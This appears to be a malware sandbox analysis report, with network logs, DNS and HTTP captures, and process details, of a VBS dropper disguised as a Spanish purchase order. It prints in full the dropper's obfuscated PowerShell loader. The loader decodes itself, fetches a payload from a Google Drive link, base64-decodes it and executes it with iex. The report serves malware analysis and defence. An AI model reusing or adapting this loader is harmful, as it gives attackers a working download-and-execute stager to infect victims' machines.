Oct 23, 2024 18:43:19.968302011 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:19.969449997 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:20.011343956 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:20.732491016 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:20.732626915 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:20.732691050 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:20.732719898 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:20.734200954 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Oct 23, 2024 18:43:20.734291077 CEST | 443 | 49706 | 142.250.185.65 | 192.168.2.8
Oct 23, 2024 18:43:20.734354973 CEST | 49706 | 443 | 192.168.2.8 | 142.250.185.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 18:43:11.621501923 CEST | 56539 | 53 | 192.168.2.8 | 1.1.1.1
Oct 23, 2024 18:43:11.628875017 CEST | 53 | 56539 | 1.1.1.1 | 192.168.2.8
Oct 23, 2024 18:43:13.006949902 CEST | 53551 | 53 | 192.168.2.8 | 1.1.1.1
Oct 23, 2024 18:43:13.015732050 CEST | 53 | 53551 | 1.1.1.1 | 192.168.2.8
Oct 23, 2024 18:43:49.741609097 CEST | 53 | 52505 | 162.159.36.2 | 192.168.2.8
Oct 23, 2024 18:43:50.369827032 CEST | 53 | 52119 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 23, 2024 18:43:11.621501923 CEST | 192.168.2.8 | 1.1.1.1 | 0x2b8e | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:43:13.006949902 CEST | 192.168.2.8 | 1.1.1.1 | 0x5fbe | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 23, 2024 18:43:11.628875017 CEST | 1.1.1.1 | 192.168.2.8 | 0x2b8e | No error (0) | drive.google.com | | 142.250.185.206 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 18:43:13.015732050 CEST | 1.1.1.1 | 192.168.2.8 | 0x5fbe | No error (0) | drive.usercontent.google.com | | 142.250.185.65 | A (IP address) | IN (0x0001) | false
                                • drive.google.com
                                • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 142.250.185.206 | 443 | 432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 16:43:12 UTC | 215 | OUT | GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                Host: drive.google.com
                                Connection: Keep-Alive
2024-10-23 16:43:12 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 23 Oct 2024 16:43:12 GMT
                                Location: https://drive.usercontent.google.com/download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download
                                Strict-Transport-Security: max-age=31536000
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Opener-Policy: same-origin
                                Content-Security-Policy: script-src 'nonce-S9QeWr6PlJ2IbCTAuixtbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49705 | 142.250.185.206 | 443 | 432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 16:43:18 UTC | 121 | OUT | GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1
                                Host: drive.google.com
                                Connection: Keep-Alive
2024-10-23 16:43:19 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 23 Oct 2024 16:43:18 GMT
                                Location: https://drive.usercontent.google.com/download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download
                                Strict-Transport-Security: max-age=31536000
                                Content-Security-Policy: script-src 'report-sample' 'nonce-LoMwXHGUymgPazWlGFTkYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Opener-Policy: same-origin
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.8 | 49706 | 142.250.185.65 | 443 | 432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-10-23 16:43:19 UTC | 139 | OUT | GET /download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download HTTP/1.1
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-10-23 16:43:20 UTC | 1904 | IN | HTTP/1.1 200 OK
                                Content-Type: text/html; charset=utf-8
                                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Wed, 23 Oct 2024 16:43:20 GMT
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Content-Security-Policy: script-src 'report-sample' 'nonce-y6f35rXfQbOcZZhcbj6EUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Resource-Policy: same-site
                                Cross-Origin-Opener-Policy: same-origin
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmII1pBicEqfwRoCxKt_nmNdD8R7Np1nPQDEf2QusTLIXmIV4uFYcf7JDjaBCX0z2pmUVJPyC-NTijLLUjNKSgoSCzKLU4vKUovijQyMTAwNDA30DIziCwwAlGMiqg"
                                Content-Length: 1692
                                X-GUploader-UploadID: AHmUCY2nxGuKPAHi96lPJ4rpD78Isaz7f4U4WPa-1pfGEUDFH9dU3Drp8yfkg-LyH66shzY7fhxK9Blh6A
                                Server: UploadServer
                                Set-Cookie: NID=518=kt_vQ0dFlOnPfp8OGQ_flcDyX5J4NC16eRCysWDC_PcRA2k1tClocmJV9Ra11jOlPKrG05hj2YTaL4MTct5JL52KZAY-4oCz62VQBzPt9JVeG35wAcZA12Kzd-0_AHqJwIDzSjW1TdffjBrQVIzM79xtwUYARRYmDhcbeW6Ko6pWXRPi3Ts; expires=Thu, 24-Apr-2025 16:43:20 GMT; path=/; domain=.google.com; HttpOnly
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Content-Security-Policy: sandbox allow-scripts
                                Connection: close
                                2024-10-23 16:43:20 UTC | 1692 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 61 50 32 4e 44 5f 77 6f 59 36 62 43 46 56 4c 37 41 4f 51 68 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="EaP2ND_woY6bCFVL7AOQhw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor



                                Target ID:0
                                Start time:12:43:05
                                Start date:23/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
                                Imagebase:0x7ff6e0050000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:12:43:08
                                Start date:23/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin 
';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu udoKompoc.rigsOgaruaLPleon s.mal=Chas Syste[Ful sNAf evEOvereTSubv..ShellSByrneeFiniccS,aftuTviv R tehuI HalvtIncavYK rosPMumblrGlot oDom,stf agmo,lloicBesvao Cry lSkdp,t eoxyUnmotpCleanEBambu]bus.e: Cong:Race,TOutflL S.atSSimpl1Eksot2Slvsn ');$Fordrvende=$Flyversjusser[0];$Filmatiserer=(Osmate11 'Raddl$QuillgOutsklPartioBolivbTenniaD vell konv:SubcrBForb oTaxeoN .lamA Tian=,tilnNTacitEPolarW ermi-KimmsONoe ebDodekjStatuERegarCpussytAdolp sko S ,manY TeatS bravT gramEOr.homEncep.RasteNKundeETeodot Bron. ipstWFhaarEOversbLetvgcMuldvlOvervI.rrinE coitN WivaTUdenl ');Semicalcareous ($Filmatiserer);Semicalcareous (Osmate11 ',loac$ Un oB uieto ercynenep aFeder. 
OocyHP.angeFralgaTak ld TaxieFoxharKildesNonre[ Retr$Po itLRackeiMtaalncoaptgCoenuv kateivokatsbaggrtPhooleUng irBolignPaatveDuplisSpgel]Syste=Knig.$ ProdfVallirSoutteUltramWhe ss SvejtBascui palel unpllComedi Forsn OvergBums sWindoeIsdanvAbbaynNaadle implnMosef ');$Flugtbilister=Osmate11 'sk le$ForurBDow sobra anevapoa Groe..nsinD.plysoDy,grwDe.obnBringl Hippo UphoaP oardsvanhF MonoiProctlbubalePa,dr(Ko if$Djve FChondoBillarForlgd Sty rknevlvRalleeUnhu nCoagudChriseHom.g, Khev$PreprC jorinon tsFemineDobbelLbeseuReengr Disse osmo1Mourn4Taels4Metat) Ef.e ';$Ciselure144=$Frstehaandsviden93;Semicalcareous (Osmate11 'Parfe$BilleGAkadeLUg deoNowhibSkod,AXmasbLAlkin:NonosFFe lbjple roBeedggEring3 Li h3Ruptu=Spand(QuadrTB.kegESfaersUnv ntFljls-mogssp HanhAPh.siTMarkeh bund Vask$ UdtrCMagtbiMonkfS nsaleSupe,lBac.sudo.jeROxyheeStudi1Gt el4 salg4Frok )Unpli ');while (!$Fjog33) {Semicalcareous (Osmate11 'Ndtvu$Dear.gOverelAcridocoo.obSmalfa A,myl Diss:Pu hfFFremmoRigorrRum,aeOm laiMatchgPneumn T tae PrverBillesSammehSyntaiP zazpAnl,s= skyg$ Clovt UdverCh rauSootpeDigox ') ;Semicalcareous $Flugtbilister;Semicalcareous (Osmate11 'BushgS StorTBijekaKoru,rUdsmutUnret- TrykSVarefLSumloE inteESnipePBrnds Celie4Faldg ');Semicalcareous (Osmate11 'Indga$QuadrgDampsLAdelaOJu.ulb Divea S,iblUnfl,:UlvanfCosigjC reboKapelgS,lgs3Conge3Indva=Aphid(S oppTDaaseECal.mSMethotGenne- Forcp FiscaMarmeTConfuH Betr U gra$Flo lcBloksiU,perS Ar eePladdLArecaUuk.lirS ottE F st1Mabes4Perg.4Stenv)M.ane ') ;Semicalcareous (Osmate11 ' Spek$ verrGBoderLCupstoSkjo,BSam ea lorcL Disk:AfsniNFlde ARegi,TU enli ColoOpun.tNMe acaEven LBjlkeSUnp aO.ngakC ,okliDobbeaWhin LSk alISubjeS Banit UnabE QuerRhustrnUt ttereaffSDoc e1Boiss8Intim5Diaph=Bravu$FigurG KremLBagueOFiremBcalmaADeposL H pn:SejrraOve,dnHugenNa herU MotoLGa,pllPodicAhypertIconveCharm+Ba,df+ Atte%Boe t$La abfUnwe.lCar.oy BigavUmbereBiblir KvarsInterj MhorUXylots rakSFootge,ahinRSnirk.noedvcPenlooGeninuCapriN obbotF dig ') 
;$Fordrvende=$Flyversjusser[$Nationalsocialisternes185];}$Cruellest=298454;$Gerri=31481;Semicalcareous (Osmate11 'Gagen$HyrekgAngi LT lefOunnotbFr dsAunpasLDiano:Dity P Vaera onogRVoldtAsipidLE.okiLTeleoEE srelBarraiB,jdsz FlydI Usvkntrig,gOverl P osp=Ins i atchg PipieSpo.vTOveri-LigniCW hluoKnotlNUnc utFadebELigulN UndiTTekni Jarvy$slapdCUnoveiEnligsKanoneFingelEvangUMonopRArc,eEKola 1T avs4pro.r4kefti ');Semicalcareous (Osmate11 'Haren$ResidgStaggl ,humoRedifb StitaStbollSporo:Uld,aM rredeEmetosFla,so Ub,sc ForfeSysilpDistihLeukoaSp inlNem.ri .ewrsKla smForla Highb=Uny,l Nonpe[AnkomSLiq eyRegios EstetForaneAquatmmikro.stukkCun,nvo metrnOptllvCubaseMa,kerFortit Pala] orta:S egr:BatfiFV ljerBedstoSkorzmstyr.B KuanaVe kos U iveenean6Hulki4UrimeSPagintcinchrIndhoiAg flnSesamgPty l(E top$ Abo.PAlebeaSnebrrIsoniaAmbullNar olEn eleInradlGaaseiByronzUnvoli LibonNew pgOutri) ksp ');Semicalcareous (Osmate11 'Tonef$TribugFuldslG neroInterB RavnAParliLRette:El ctsLovbrk LukkaIndusAUnpron Eft SNusseeSkoleLIns.rs optrLTurb,S palaePsiloRinforeSeaf Allo =Nonc, Numme[BespasOutthyChippsGearvtTi sye Sta mAntip.Eddist BetjEAfstixTintotSharr. Outne bolinHilahcD,magO ealiDHurinIMarg.NSparkgBndel]mercu: Ch o:SayabAJuvenSRumfrcTysklIG ltyITendi.FairegFusleESamdrtS nkrsRygeatUlykkrFlyveI Anc N AlthGSwing(Sel.r$ha inMBethleOvermS O phoMikroc PassE VernPRecocH SeraaInnatl Ter,IPlatySultr mSting) Bl,t ');Semicalcareous (Osmate11 'Adeno$VandbgEhre LAffotoGidsebLykkeaP esslBagag:NulleaR.empn BaneTfogedESuperGCelluN pponi Dri NAchaeg.iploe LyncR.erraNPresteUnpo =Purdu$ rawls C leK rammADissea.evolNIndhySDetacEO.istlRekruSSnoreLloddesSempleHandsRS,jdmE Eyne.CanthsVvni u Famib I prsDagblTFolioR yllaISttedn Fol G rgot(stu i$ExtraCCheerRP omiU Li aeU,memLU.vejl OrthE TimeS ensiTTeg,e, Yuck$ForkoG eserESkattrGa.anR NundIMoe,t)Butto ');Semicalcareous $Antegningerne;"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:12:43:08
                                Start date:23/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b254c75f771169b096177d58a158df313b1df4fb54ef45ede3a1f8979c1b463
                                  • Instruction ID: ed9add531872241d3df86280588d9410e36e79a5906b67d2048a6e8263a76baa
                                  • Opcode Fuzzy Hash: 5b254c75f771169b096177d58a158df313b1df4fb54ef45ede3a1f8979c1b463
                                  • Instruction Fuzzy Hash: 06C153E294EA8A4FE7E5EF7CCC156B57F94EF41B10B2804FAE44CC7483D919A8058382
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b61b10c4fb20164c26f6ec64bc75ff5cdd0c2bfad3c69c31a424f549d4a754e3
                                  • Instruction ID: 0b3389decfcfe0043e5127749232ac8cce3b162f134128fae45a2b8b902345f6
                                  • Opcode Fuzzy Hash: b61b10c4fb20164c26f6ec64bc75ff5cdd0c2bfad3c69c31a424f549d4a754e3
                                  • Instruction Fuzzy Hash: 4AA147A2A1DB864FE7E9EF3C9F151B57EC5EF95A10B2800FED44DC3593DD18A8058282
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1dcb56068dbba065be971ed8dd234ad0c2c818dfbbea1f235450c8915c2f2bae
                                  • Instruction ID: 7c69d7601233a120afb0f678434c154a7b67dba8fffeb4efc04d9237984e7072
                                  • Opcode Fuzzy Hash: 1dcb56068dbba065be971ed8dd234ad0c2c818dfbbea1f235450c8915c2f2bae
                                  • Instruction Fuzzy Hash: CB2129A2A0DB868FE3E5EF3C9F501757AC5EF95A10B6800F9D04CC3583DD1CAC058246
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d4d5a81ba2bba5866a259e9659f14f109b9300ee023849c0a33287da8bc0745
                                  • Instruction ID: fdd5f452391756c1b3bcdce854817c2fc90a332d3f60751632a623f22f7fb4d1
                                  • Opcode Fuzzy Hash: 3d4d5a81ba2bba5866a259e9659f14f109b9300ee023849c0a33287da8bc0745
                                  • Instruction Fuzzy Hash: EE21CFD2E0EBC61FF3E5EE7C9C291646FD59F5AA52B1900FAD088CB493D80C18098352
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b202ee30c71e855c85d93a462f1bdfbb7ebc52e48d0472c3f5acd0bfff75d7
                                  • Instruction ID: 4bf818914cf7dc07965863eb4095eb805abc96f17daa6eb288435d114dbb7c1d
                                  • Opcode Fuzzy Hash: f1b202ee30c71e855c85d93a462f1bdfbb7ebc52e48d0472c3f5acd0bfff75d7
                                  • Instruction Fuzzy Hash: 191122F2A4D6868FE7D9EE7CC8502B87B91EF48700F2408FED48DC7883C929A8458351
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd946d87b59b966f890ee414c8d2112db42ee079db004996b8825d2424e8b258
                                  • Instruction ID: 8134e909322420b7261af91c8fae2889e130eabae45eeb8f06a3931b789919f8
                                  • Opcode Fuzzy Hash: fd946d87b59b966f890ee414c8d2112db42ee079db004996b8825d2424e8b258
                                  • Instruction Fuzzy Hash: B401B58458E2C65FD753AB7848301A26FA48F13228B2800FBD0D9C60D3D90C145AC357
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1680923314.00007FFB4AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ab90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                  • Instruction ID: 20e8384b17ff374d5d7faf06dce1a730c0fc29ca1f58ec3204148c86ec976df9
                                  • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                  • Instruction Fuzzy Hash: F601A77010CB0C8FD744EF0CE091AA5B3E0FB99320F10056DE58AC3661D632E882CB41
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ef6bed14aedf46128ba79f79e10fb0f5d23856a55e3de45ee609b579b36cf6e
                                  • Instruction ID: 19e51be26be4c09512e5d9e0848993482da4f1ee53514cd5dd4ba7bb3266df7f
                                  • Opcode Fuzzy Hash: 8ef6bed14aedf46128ba79f79e10fb0f5d23856a55e3de45ee609b579b36cf6e
